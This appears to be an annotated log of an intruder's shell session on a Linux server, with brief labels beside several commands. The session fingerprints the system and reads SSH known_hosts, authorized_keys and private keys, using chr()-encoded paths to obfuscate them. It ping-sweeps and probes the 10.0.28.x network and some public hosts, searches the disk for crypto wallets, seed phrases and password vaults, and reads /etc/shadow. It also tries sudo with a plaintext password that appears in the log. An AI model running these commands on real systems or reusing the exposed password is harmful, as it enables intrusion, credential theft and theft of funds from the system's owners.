Ran uname 1x across 1 sessions β automated OS fingerprinting.
$ python -c "f=open(chr(47)+chr(114)+chr(111)+chr(111)+chr(116)+chr(47)+chr(46)+chr(115)+chr(115)+chr(104)+chr(47)+chr(107)+chr(110)+chr(111)+chr(119)+chr(110)+chr(95)+chr(104)+chr(111)+chr(115)+chr(116)+chr(115)); d=f.read(); f.close(); print hex(len(d)); print repr(d)"
$ perl -e "open(F,q(<),q(/root/.ssh/known_hosts)); while(<F>){print}" // Perl one-liner execution
$ more /root/.ssh/known_hosts 2>/dev/null || cat /root/.ssh/known_hosts
$ sed -n "p" /root/.ssh/known_hosts
$ cat /root/.ssh/known_hosts Γ3
$ /bin/sh -c "python -c \"import os; os.system(chr(108)+chr(115)+chr(32)+chr(45)+chr(97)+chr(32)+chr(47)+chr(114)+chr(111)+chr(111)+chr(116)+chr(47)+chr(46)+chr(115)+chr(115)+chr(104)+chr(47))\"" // Python one-liner execution
$ python -c "import os; os.system(chr(108)+chr(115)+chr(32)+chr(45)+chr(97)+chr(32)+chr(47)+chr(114)+chr(111)+chr(111)+chr(116)+chr(47)+chr(46)+chr(115)+chr(115)+chr(104)+chr(47))" // Python one-liner execution
$ /bin/sh -c "python -c \"import sys; f=open(chr(47)+chr(114)+chr(111)+chr(111)+chr(116)+chr(47)+chr(46)+chr(115)+chr(115)+chr(104)+chr(47)+chr(107)+chr(110)+chr(111)+chr(119)+chr(110)+chr(95)+chr(104)+chr(111)+chr(115)+chr(116)+chr(115)); print f.read().encode(chr(10)); f.close()\"" // Python one-liner execution
$ python -c "import sys; f=open(chr(47)+chr(114)+chr(111)+chr(111)+chr(116)+chr(47)+chr(46)+chr(115)+chr(115)+chr(104)+chr(47)+chr(107)+chr(110)+chr(111)+chr(119)+chr(110)+chr(95)+chr(104)+chr(111)+chr(115)+chr(116)+chr(115)); print f.read().encode(chr(10)); f.close()" // Python one-liner execution
$ /bin/sh -c "grep 207 /root/.ssh/known_hosts 2>/dev/null; grep 173 /root/.ssh/known_hosts 2>/dev/null; grep 147 /root/.ssh/known_hosts 2>/dev/null; grep 104 /root/.ssh/known_hosts 2>/dev/null; echo GREP_DONE"
$ grep 207 /root/.ssh/known_hosts 2>/dev/null; grep 173 /root/.ssh/known_hosts 2>/dev/null; grep 147 /root/.ssh/known_hosts 2>/dev/null; grep 104 /root/.ssh/known_hosts 2>/dev/null; echo GREP_DONE
$ /bin/sh -c "grep -E "[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+" /root/.ssh/known_hosts"
$ grep -E [ 0-9 ] +. [ 0-9 ] +. [ 0-9 ] +. [ 0-9 ] + /root/.ssh/known_hosts
$ /bin/sh -c "dd if=/root/.ssh/known_hosts bs=1024 count=1 2>/dev/null | python -c \"import sys; data=sys.stdin.read(); print repr(data)\"" // Python one-liner execution
$ dd if=/root/.ssh/known_hosts bs=1024 count=1 2>/dev/null | python -c "import sys; data=sys.stdin.read(); print repr(data)" // Python one-liner execution
$ /bin/sh -c "dd if=/root/.ssh/known_hosts bs=1024 count=1 2>/dev/null | wc -c" // disk operation
$ dd if=/root/.ssh/known_hosts bs=1024 count=1 2>/dev/null | wc -c // disk operation
$ /bin/sh -c "dd if=/root/.ssh/known_hosts bs=442 count=1 2>/dev/null | wc -c" // disk operation
$ dd if=/root/.ssh/known_hosts bs=442 count=1 2>/dev/null | wc -c // disk operation
$ /bin/sh -c "python -c \"f=open(chr(47)+chr(114)+chr(111)+chr(111)+chr(116)+chr(47)+chr(46)+chr(115)+chr(115)+chr(104)+chr(47)+chr(107)+chr(110)+chr(111)+chr(119)+chr(110)+chr(95)+chr(104)+chr(111)+chr(115)+chr(116)+chr(115)); data=f.read(); print len(data); f.close()\""
$ python -c "f=open(chr(47)+chr(114)+chr(111)+chr(111)+chr(116)+chr(47)+chr(46)+chr(115)+chr(115)+chr(104)+chr(47)+chr(107)+chr(110)+chr(111)+chr(119)+chr(110)+chr(95)+chr(104)+chr(111)+chr(115)+chr(116)+chr(115)); data=f.read(); print len(data); f.close()"
$ /bin/sh -c "ls -la /root/.ssh/; ls -la /root/.ssh/known_hosts; wc -c < /root/.ssh/known_hosts"
$ ls -la /root/.ssh/; ls -la /root/.ssh/known_hosts; wc -c < /root/.ssh/known_hosts
$ /bin/sh -c "cat /root/.ssh/known_hosts; echo ===END_KH==="
$ cat /root/.ssh/known_hosts; echo ===END_KH===
$ echo hello
$ sh -c echo test2
$ echo test2
$ /bin/sh -c echo test
$ echo test
$ python -c "f=open(chr(47)+chr(114)+chr(111)+chr(111)+chr(116)+chr(47)+chr(46)+chr(115)+chr(115)+chr(104)+chr(47)+chr(107)+chr(110)+chr(111)+chr(119)+chr(110)+chr(95)+chr(104)+chr(111)+chr(115)+chr(116)+chr(115)); print repr(f.read()); f.close()"
$ python -c "print open(chr(47)+chr(114)+chr(111)+chr(111)+chr(116)+chr(46)+chr(116)+chr(120)+chr(116)).read()"
$ python -c "import os; os.system(chr(98)+chr(97)+chr(115)+chr(101)+chr(54)+chr(52)+chr(32)+chr(47)+chr(114)+chr(111)+chr(111)+chr(116)+chr(46)+chr(116)+chr(120)+chr(116))" // Python one-liner execution
$ /bin/sh -c "base64 /root/.ssh/known_hosts > /tmp/kh_b64.txt; cat /tmp/kh_b64.txt" // execute from /tmp
$ base64 /root/.ssh/known_hosts > /tmp/kh_b64.txt; cat /tmp/kh_b64.txt // execute from /tmp
$ cat /tmp/kh_b64.txt // execute from /tmp
$ base64 /root/.ssh/known_hosts > /tmp/kh_b64.txt // execute from /tmp
$ dd if=/root/.ssh/known_hosts 2>/dev/null // disk operation
$ python -c "print(open(chr(47)+chr(114)+chr(111)+chr(111)+chr(116)+chr(46)+chr(116)+chr(120)+chr(116)).read())" 2>/dev/null || echo "FAIL"
$ ls -la /var/backups/ 2>/dev/null
$ cat /root/.ssh/known_hosts | head
$ ls -la /root/.ssh/known_hosts; od -c /root/.ssh/known_hosts | head -5
$ wc -c /root/.ssh/known_hosts; cat /root/.ssh/known_hosts; echo "END"
$ find / -name "id_*" -o -name "*.pub" 2>/dev/null | grep -v -E "/proc|/sys|/usr/lib|/usr/share"
$ ls -la /root/.ssh/
$ cat /etc/ssh/ssh_host_ecdsa_key.pub
$ cat /etc/ssh/ssh_host_dsa_key.pub
$ cat /etc/ssh/ssh_host_rsa_key.pub
$ python -c "import socket; s=socket.socket(); s.settimeout(2); s.connect(('10.0.28.1',22)); print('22:OPEN'); s.close()" 2>&1; echo '==='; python -c "import socket; s=socket.socket(); s.settimeout(2); s.connect(('10.0.28.2',22)); print('22:OPEN'); s.close()" 2>&1; echo '==='; python -c "import socket; s=socket.socket(); s.settimeout(2); s.connect(('10.0.28.10',22)); print('22:OPEN'); s.close()" 2>&1 // Python one-liner execution
$ curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.1/ 2>&1; echo ''; curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.2/ 2>&1; echo ''; curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.3/ 2>&1; echo ''; curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.4/ 2>&1; echo ''; curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.5/ 2>&1; echo ''; curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.6/ 2>&1; echo ''; curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.7/ 2>&1; echo ''; curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.9/ 2>&1; echo ''; curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.10/ 2>&1; echo ''; curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.11/ 2>&1; echo ''; curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.12/ 2>&1; echo ''; curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.13/ 2>&1; echo ''; curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.14/ 2>&1; echo ''; curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.15/ 2>&1; echo ''; curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.16/ 2>&1; echo ''; curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.17/ 2>&1; echo ''; curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.18/ 2>&1; echo ''; curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.19/ 2>&1; echo ''; curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.20/ 2>&1; echo '' // payload download
$ ping 10.0.28.20 2>&1 | head -1
$ ping 10.0.28.19 2>&1 | head -1
$ ping 10.0.28.18 2>&1 | head -1
$ ping 10.0.28.17 2>&1 | head -1
$ ping 10.0.28.16 2>&1 | head -1
$ ping 10.0.28.15 2>&1 | head -1
$ ping 10.0.28.14 2>&1 | head -1
$ ping 10.0.28.13 2>&1 | head -1
$ ping 10.0.28.12 2>&1 | head -1
$ ping 10.0.28.11 2>&1 | head -1
$ ping 10.0.28.10 2>&1 | head -1
$ ping 10.0.28.9 2>&1 | head -1
$ ping 10.0.28.8 2>&1 | head -1
$ ping 10.0.28.7 2>&1 | head -1
$ ping 10.0.28.6 2>&1 | head -1
$ ping 10.0.28.5 2>&1 | head -1
$ ping 10.0.28.4 2>&1 | head -1
$ ping 10.0.28.3 2>&1 | head -1
$ ping 10.0.28.2 2>&1 | head -1
$ ping 10.0.28.1 2>&1 | head -1
$ ping 10.0.28.1 2>&1
$ ping -n -c 1 10.0.28.1 2>&1; echo "==="
$ ping -c 1 10.0.28.1 2>&1; echo "==="; ping -c 1 10.0.28.2 2>&1; echo "==="; ping -c 1 10.0.28.10 2>&1
$ ping -c 1 -w 1 10.0.28.1 2>&1; echo "---"; ping -c 1 -w 1 10.0.28.2 2>&1; echo "---"; ping -c 1 -w 1 10.0.28.3 2>&1; echo "---"; ping -c 1 -w 1 10.0.28.4 2>&1; echo "---"; ping -c 1 -w 1 10.0.28.5 2>&1; echo "---"; ping -c 1 -w 1 10.0.28.6 2>&1; echo "---"; ping -c 1 -w 1 10.0.28.7 2>&1; echo "---"; ping -c 1 -w 1 10.0.28.9 2>&1; echo "---"; ping -c 1 -w 1 10.0.28.10 2>&1
$ for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25; do; result=$(ping -c 1 -w 1 10.0.28.$i 2>&1); if echo "$result" | grep -q "64 bytes"; then; echo "ALIVE: 10.0.28.$i"; fi; done; echo "---LOCAL_SCAN_DONE---"
$ ping -c 1 -w 1 10.0.28.$i 2 >& 1
$ echo "---PING_VPN---"; ping -c 1 -W 2 207.180.241.246 2>&1; echo "---PING_HOSTING1---"; ping -c 1 -W 2 173.224.125.34 2>&1; echo "---PING_HOSTING2---"; ping -c 1 -W 2 muddy.mwgsm.com 2>&1; echo "---PING_N8N---"; ping -c 1 -W 2 147.93.154.84 2>&1; echo "---DNS_REVERSE---"; nslookup 104.152.208.8 2>&1 || host 104.152.208.8 2>&1 || echo "no nslookup/host"; echo "---ARP_TABLE---"; cat /proc/net/arp 2>/dev/null || echo "no arp"; echo "---ROUTING---"; route -n 2>/dev/null || netstat -rn 2>/dev/null; echo "---GATEWAY_CHECK---"; ping -c 1 -W 2 104.152.208.1 2>&1; echo "---DONE_PING---"
$ ping -c 1 -W 1 104.180.241.246 2>/dev/null && echo "PONG_104.152.208.$i"
$ stat /etc/ssh/sshd_config
$ wc /etc/ssh/sshd_config
$ wc -l /etc/ssh/sshd_config; wc -c /etc/ssh/sshd_config
$ cat /etc/ssh/sshd_config
$ cat /etc/ssh/sshd_config 2>/dev/null; echo "---HOST_KEYS---"; cat /etc/ssh/ssh_host_dsa_key.pub 2>/dev/null; echo "---HOST_RSA---"; cat /etc/ssh/ssh_host_rsa_key.pub 2>/dev/null; echo "---HOST_ECDSA---"; cat /etc/ssh/ssh_host_ecdsa_key.pub 2>/dev/null
$ du -sh /* 2>/dev/null; echo "---SECDIR---"; ls -la /etc/ssh/ 2>/dev/null; echo "---SSH_CONFIG---"; cat /etc/ssh/sshd_config 2>/dev/null
$ echo "---KNOWN_HOSTS---"; cat /root/.ssh/known_hosts 2>/dev/null; echo "---APTITUDE---"; cat /root/.aptitude/config 2>/dev/null; echo "---ROOT_BASHRC---"; cat /root/.bashrc 2>/dev/null; echo "---DISK_USAGE_DETAIL---"; du -sh /* 2>/dev/null; du -sh /var/* 2>/dev/null; du -sh /etc/* 2>/dev/null | grep -v -E "0K|4$"; echo "---DONE---"
$ find /home -type f 2>/dev/null; echo "---H_DONE---"; find /root -type f 2>/dev/null; echo "---R_DONE---"; find /opt -type f 2>/dev/null; echo "---O_DONE---"; find /srv -type f 2>/dev/null; echo "---S_DONE---"
$ find / -maxdepth 6 -type f -name "*wallet*" 2>/dev/null | grep -v -E "/proc|/sys|/usr/lib|/usr/share"; echo "---W1---"; find / -maxdepth 6 -type f -name "*mnemonic*" 2>/dev/null | grep -v -E "/proc|/sys|/usr/lib|/usr/share"; echo "---W2---"; find / -maxdepth 6 -type f -name "*seed*" 2>/dev/null | grep -v -E "/proc|/sys|/usr/lib|/usr/share"; echo "---W3---"; find / -maxdepth 6 -type f -name "*.kdbx" 2>/dev/null | grep -v -E "/proc|/sys|/usr/lib|/usr/share"; echo "---W4---"; find / -maxdepth 6 -type f -name "*keystore*" 2>/dev/null | grep -v -E "/proc|/sys|/usr/lib|/usr/share"; echo "---W5---"
$ echo "---FIND_WALLET---"; find / -maxdepth 6 -type f \( -name "*wallet*" -o -name "*mnemonic*" -o -name "*seed*" -o -name "*private*key*" -o -name "*keystore*" -o -name "*.kdbx" -o -name "wallet.dat" -o -name "*bip39*" -o -name "*ledger*" -o -name "*trezor*" -o -name "*metamask*" -o -name "*phantom*" -o -name "*coinbase*" \) 2>/dev/null | grep -v -E "/proc|/sys|/usr/lib|/usr/share"; echo "---FIND_TEXT_CONTENT---"; find /home -type f 2>/dev/null; find /root -type f 2>/dev/null | grep -v -E "/proc|/sys"; echo "---FIND_ANY_DATA---"; find /opt /srv /var/www /data /home /root -type f 2>/dev/null | grep -v -E "/proc|/sys|/usr"; echo "---DONE_WALLET---"
$ ps aux | grep -v grep | grep -E "mysql|ejabberd|exim|php|apache|nginx"
$ find / -maxdepth 5 -type f -size +1k -size -1M -newer /etc/hostname 2>/dev/null | grep -v -E "/proc|/sys|/usr/lib|/usr/share|/usr/local|dpkg|apt|log|cache|/tmp"
$ find / -maxdepth 5 -type f -size +1k -size -1M -newer /etc/hostname 2>/dev/null | grep -v -E "/proc|/sys|/usr/lib|/usr/share|/usr/local|dpkg|apt|log|cache|/tmp" | head -50
$ grep -r -l -i "password\|secret\|api_key\|apikey\|token" /etc/ 2>/dev/null | grep -v -E "/proc|/sys|/usr/share|/etc/ssl|/etc/pam|/etc/apt" | head -30
$ ls /etc/init.d/
$ cat /etc/init.d/ssh | grep -v "^#" | grep -v "^$"
$ echo "---RC_LOCAL_TYPE---"; strings /etc/rc.local 2>/dev/null | head -30; echo "---INIT_SCRIPTS---"; for f in /etc/init.d/*; do echo "--- $f ---"; cat "$f" 2>/dev/null | grep -v "^#" | grep -v "^$" | head -10; done; echo "---FIND_EJABBERD_CONFIG---"; find / -maxdepth 5 -name "ejabberd*" 2>/dev/null | grep -v -E "/proc|/sys|/usr"; echo "---FIND_MYSQL_CONFIG---"; find / -maxdepth 5 -name "my.cnf" -o -name "mysqld*" 2>/dev/null | grep -v -E "/proc|/sys|/usr"; echo "---FIND_EXIM_CONFIG---"; find / -maxdepth 5 -name "exim*" 2>/dev/null | grep -v -E "/proc|/sys|/usr"; echo "---FIND_VBOX_GUEST---"; find / -maxdepth 4 -name "*vbox*" 2>/dev/null | grep -v -E "/proc|/sys|/usr/lib|/usr/share"; echo "---FIND_VALET/DOCKER/ANY_RUNTIME---"; ls -la /var/run/ 2>/dev/null | head -30; echo "---DONE---"
$ echo "---RC_LOCAL_CONTENTS---"; cat /etc/rc.local 2>/dev/null; echo "---FIND_NFS---"; cat /etc/fstab 2>/dev/null; echo "---FIND_MOUNTS---"; mount 2>/dev/null; echo "---FIND_ANY_NFS---"; cat /etc/exports 2>/dev/null; echo "---FIND_NETWORK_CONF---"; cat /etc/network/interfaces 2>/dev/null; echo "---FIND_KVM_VBOX---"; lsmod 2>/dev/null; echo "---FIND_VBOX_GUEST---"; ls /usr/lib/virtualbox/ 2>/dev/null; echo "---FIND_VBOX_CONFIG---"; cat /etc/vbox/VBoxNet.conf 2>/dev/null; echo "---FIND_DB_FILES---"; find / -maxdepth 5 -type f \( -name "*.db" -o -name "*.sqlite" -o -name "*.sqlite3" \) 2>/dev/null | grep -v -E "/proc|/sys|/usr"; echo "---FIND_CONFIG_FILES_CONTENTS---"; grep -r -l "password\|secret\|api_key\|apikey\|token\|private" /etc/ 2>/dev/null | grep -v -E "/proc|/sys|/usr/share|/etc/ssl|/etc/pam" | head -30; echo "---DONE---"
$ echo "---PYTHON_VERSION---"; python --version 2>&1; echo "---WHAT_PYTHON_IS---"; which python; file $(which python); echo "---INITDB---"; ls /etc/init.d/ | sort; echo "---UPSTART---"; ls /etc/init/ 2>/dev/null; echo "---FIND_SCRIPTS---"; find / -maxdepth 4 -type f -name "*.py" 2>/dev/null | grep -v -E "/usr/lib|/usr/share|/proc|/sys"; find / -maxdepth 4 -type f -name "*.sh" 2>/dev/null | grep -v -E "/usr/lib|/usr/share|/proc|/sys"; echo "---FIND_PHP---"; find / -maxdepth 4 -type f -name "*.php" 2>/dev/null | grep -v -E "/usr/lib|/usr/share|/proc|/sys|/usr/local"; echo "---FIND_RC_LOCAL---"; cat /etc/rc.local 2>/dev/null; echo "---FIND_ANYTHING_RECENT---"; find / -maxdepth 5 -type f -mtime -365 2>/dev/null | grep -v -E "/proc|/sys|/usr/lib|/usr/share|/usr/local/lib|dpkg|apt|log|cache" | head -100; echo "---SYSCTL---"; cat /etc/sysctl.conf 2>/dev/null | grep -v "^#" | grep -v "^$"; echo "---DONE---"
$ which python
$ echo "---MYSQL_SOCKET---"; ls -la /var/run/mysqld/ 2>/dev/null; ls -la /tmp/mysql* 2>/dev/null; echo "---MYSQL_PROC---"; ps aux | grep mysql; echo "---EJABBERD_PROC---"; ps aux | grep ejabberd; echo "---EXIM_PROC---"; ps aux | grep exim; echo "---ALL_LISTENING---"; ss -tlnp 2>/dev/null; echo "---ALL_LISTENING2---"; netstat -tlnp 2>/dev/null; echo "---NETSTAT_ALL---"; netstat -anp 2>/dev/null | head -50; echo "---MYSQL_DATA_DIR---"; ls -la /var/lib/mysql/ 2>/dev/null || echo "empty or no access"; echo "---PHPMYADMIN---"; ls -la /var/www/phpmyadmin/ 2>/dev/null || echo "no phpmyadmin"; echo "---MYSQL_BACKUPS---"; find / -maxdepth 3 -name "*.sql" 2>/dev/null; echo "---DONE---" // execute from /tmp
$ echo "---MYSQL---"; cat /etc/mysql/my.cnf 2>/dev/null | grep -v "^#" | grep -v "^$"; ls /etc/mysql/conf.d/ 2>/dev/null; echo "---MYSQL_DATA---"; ls /var/lib/mysql/ 2>/dev/null; echo "---EJABBERD---"; cat /etc/ejabberd/ejabberd.cfg 2>/dev/null | head -80; echo "---EJABBERD2---"; cat /etc/ejabberd/ejabberd.yml 2>/dev/null | head -80; echo "---PHIL_HOME---"; ls -la /home/phil/ 2>/dev/null; cat /home/phil/.bashrc 2>/dev/null; cat /home/phil/.bash_history 2>/dev/null; echo "---WWW---"; ls -laR /var/www/ 2>/dev/null | head -50; echo "---MAIL---"; ls -la /var/mail/ 2>/dev/null; ls -la /var/spool/mail/ 2>/dev/null; echo "---EXIM---"; cat /etc/exim4/exim4.conf.localmacros 2>/dev/null | head -30; echo "---NETWORK---"; netstat -tlnp 2>/dev/null; echo "---DONE---" // history snooping
$ cat /root/.ssh/authorized_keys 2>/dev/null; echo "---SSH_DONE---"; cat /root/.ssh/id_rsa 2>/dev/null; echo "---KEY_DONE---" // SSH key persistence
$ ps aux; echo "---PROC_DONE---"; ls -la /root/ 2>/dev/null; echo "---ROOT_DONE---"; ls -la /opt/ 2>/dev/null; echo "---OPT_DONE---"; ls -la /srv/ 2>/dev/null; echo "---SRV_DONE---"; ls -la /var/www/ 2>/dev/null; echo "---WWW_DONE---"; cat /etc/passwd; echo "---PASSWD_DONE---" // user enumeration
$ find / -maxdepth 5 -type f -name "*.conf" 2>/dev/null | grep -v -E "/proc/|/sys/|/usr/share|/usr/lib|/usr/share/doc|dpkg" | head -50; echo "---CONF_DONE---"
$ find / -maxdepth 5 -type f \( -name "*.txt" -o -name "*.md" -o -name "*.csv" -o -name "*.json" -o -name "*.yml" -o -name "*.yaml" -o -name "*.conf" -o -name "*.cfg" -o -name "*.ini" \) 2>/dev/null | grep -v -E "/proc/|/sys/|/usr/share|/usr/lib|/usr/share/doc|dpkg" | head -100; echo "---CONF_DONE---"
$ find / -maxdepth 4 -type f -name "*.env" -o -name ".env" -o -name "*.pem" -o -name "*.key" -o -name "*.crt" -o -name "*.p12" -o -name "*.pfx" -o -name "*.kdbx" -o -name "wallet.dat" -o -name "*.wallet" 2>/dev/null; echo "---FILE_LIST_DONE---"
$ echo "=== ANY FILE WITH PASSWORD IN / ==="; find / -maxdepth 4 -type f \( -name "*.env" -o -name ".env" -o -name "*.pem" -o -name "*.key" -o -name "*.crt" -o -name "*.p12" -o -name "*.pfx" -o -name "*.kdbx" -o -name "wallet.dat" -o -name "*.wallet" \) 2>/dev/null; echo "=== TEXT FILES WITH mnemonic OR seed OR wallet ==="; find / -maxdepth 5 -type f -name "*.txt" -o -name "*.md" -o -name "*.csv" -o -name "*.json" -o -name "*.yml" -o -name "*.yaml" -o -name "*.conf" 2>/dev/null | head -100; echo "=== CHECK COMMON SECRETS PATHS ==="; ls -la /root/ 2>/dev/null || echo "cannot read /root"; ls -la /opt/ 2>/dev/null || echo "cannot read /opt"; ls -la /srv/ 2>/dev/null || echo "cannot read /srv"; ls -la /var/www/ 2>/dev/null || echo "cannot read /var/www"; echo "=== USER HOME DIRS ==="; cat /etc/passwd; echo "=== CHECK ANY SSH KEYS ON SYSTEM ==="; find / -maxdepth 4 -name "id_*" -o -name "known_hosts" -o -name "ssh_config" 2>/dev/null; echo "=== CHECK /ETC/SHADOW ==="; cat /etc/shadow 2>/dev/null | head -20 || echo "cannot read /etc/shadow"; echo "=== CHECK FOR ANY DATABASE FILES ==="; find / -maxdepth 4 \( -name "*.db" -o -name "*.sqlite" -o -name "*.sqlite3" -o -name "*.sql" \) 2>/dev/null; echo "=== CHECK FOR NODE/JS PROJECTS ==="; find / -maxdepth 4 -name "package.json" 2>/dev/null; echo "=== CHECK FOR PYTHON PROJECTS ==="; find / -maxdepth 4 -name "requirements.txt" 2>/dev/null; echo "=== CHECK FOR VIRTUAL HOSTS ==="; ls -la /etc/nginx/ 2>/dev/null || echo "no nginx"; ls -la /etc/apache2/ 2>/dev/null || echo "no apache"; ls -la /etc/lighttpd/ 2>/dev/null || echo "no lighttpd"; echo "=== CHECK FOR ANY RUNNING PROCESSES ==="; ps aux 2>/dev/null; echo "=== DONE ===" // user enumeration
$ echo "=== INSTALLED PACKAGES ==="; dpkg -l 2>/dev/null | head -100; echo "=== WHICH COMMANDS ==="; which python node npm docker mongod redis mysql psql tmux screen git curl wget 2>/dev/null; echo "=== /tmp ==="; ls -la /tmp/ 2>/dev/null | head -30; echo "=== /var/log ==="; ls -la /var/log/ 2>/dev/null | head -30; echo "=== /etc/cron* ==="; ls -la /etc/cron* 2>/dev/null; cat /etc/crontab 2>/dev/null; echo "=== SYSTEMD ==="; ls /etc/init.d/ 2>/dev/null; echo "=== NETWORK ==="; route -n 2>/dev/null; cat /etc/resolv.conf 2>/dev/null; cat /etc/hosts 2>/dev/null; echo "=== /etc/ssh ==="; cat /etc/ssh/sshd_config 2>/dev/null | grep -v "^#" | grep -v "^$"; echo "=== /etc/hostname ==="; cat /etc/hostname 2>/dev/null; echo "=== /etc/os-release ==="; cat /etc/issue 2>/dev/null // persistence setup
$ echo OK
$ echo Muddy2!@#2wsx | sudo -S echo SUDO_OK
$ echo '=== .SSH DIR ==='; ls -la ~/.ssh/ 2>/dev/null || echo 'no .ssh'; echo '=== SSH KEYS ==='; cat ~/.ssh/id_* 2>/dev/null || echo 'no private keys'; cat ~/.ssh/authorized_keys 2>/dev/null || echo 'no authorized_keys'; echo '=== ENV VARS ==='; env | sort; echo '=== HOME FILES ==='; ls -la ~/; echo '=== HOME DIRS ==='; find ~ -maxdepth 3 -type f -name '*.env' -o -name '.env' -o -name '*.pem' -o -name '*.key' -o -name '*.crt' -o -name '*.pem' -o -name 'wallet*' -o -name 'mnemonic*' -o -name 'seed*' -o -name '*.kdbx' -o -name 'keystore*' -o -name '.passwords*' -o -name '*.txt' -o -name 'credentials*' 2>/dev/null | head -50; echo '=== RECENT FILES ==='; find ~ -maxdepth 3 -type f -mtime -90 2>/dev/null | head -50; echo '=== SUDO PASSWD ==='; sudo -S echo SUDO_WORKED <<< 'Muddy2!@#2wsx' 2>&1 // password change attempt
$ echo '=== SYSTEM INFO ==='; uname -a; hostname; echo '=== WHOAMI ==='; whoami; id; echo '=== SUDO ACCESS ==='; sudo -l 2>/dev/null; echo '=== USERS ==='; cat /etc/passwd | grep -v nologin | grep -v false; echo '=== LISTENING PORTS ==='; ss -tlnp 2>/dev/null || netstat -tlnp 2>/dev/null; echo '=== RUNNING SERVICES ==='; systemctl list-units --type=service --state=running 2>/dev/null | head -60; echo '=== CRONTAB ==='; crontab -l 2>/dev/null; echo '=== DOCKER ==='; docker ps -a 2>/dev/null || echo 'no docker'; echo '=== MOUNTS ==='; df -h 2>/dev/null; echo '=== IP ADDRESSES ==='; ip addr show 2>/dev/null | grep 'inet '; echo '=== LAST LOGIN ==='; last -5 2>/dev/null; echo '=== BASH HISTORY ==='; cat ~/.bash_history 2>/dev/null | tail -80; echo '=== END ===' // user enumeration
$ echo OK_Muddy2!@#2wsx